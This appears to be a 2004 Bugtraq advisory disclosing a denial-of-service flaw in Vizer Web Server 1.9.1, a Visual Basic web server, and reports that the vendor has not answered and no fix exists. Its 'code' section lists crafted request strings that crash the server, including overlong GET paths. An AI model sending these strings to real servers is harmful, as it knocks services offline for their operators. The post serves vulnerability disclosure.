Bugtraq mailing list archives
Denial Of Service in Vizer Web Server 1.9.1
From: "Donato Ferrante" <fdonato () autistici org>
Date: Tue, 17 Feb 2004 09:49:48 -0000
Donato Ferrante Application: Vizer Web Server http://sourceforge.net/projects/vizerwebserver/ Version: 1.9.1 Bug: Denial Of Service Author: Donato Ferrante e-mail: fdonato () autistici org web: www.autistici.org/fdonato xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 1. Description 2. The bug 3. The code 4. The fix xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ---------------- 1. Description: ---------------- Vendor's Description: "Vizer is an open source web server written in Visual Basic." xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ------------- 2. The bug: ------------- The program doesn't well menage the input strings received, so an attacker is able to crash the web server, sending a crafted string. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ------------- 3. The code: ------------- To test the vulnerability, send to the web server a string like: index.htm ( without specifying GET and HTTP ) or: GET /aaaaaa[ 250 of a ]aaa HTTP/1.1 ( specifying GET and HTTP ) GET /aaaaaa[ 250 of a ]aaa ( specifying only GET ) or: GET c:\ ( specifying only GET ) xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ------------ 4. The fix: ------------ No fix. The vendor has not answered to my signalations. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Current thread:
- Denial Of Service in Vizer Web Server 1.9.1 Donato Ferrante (Feb 17)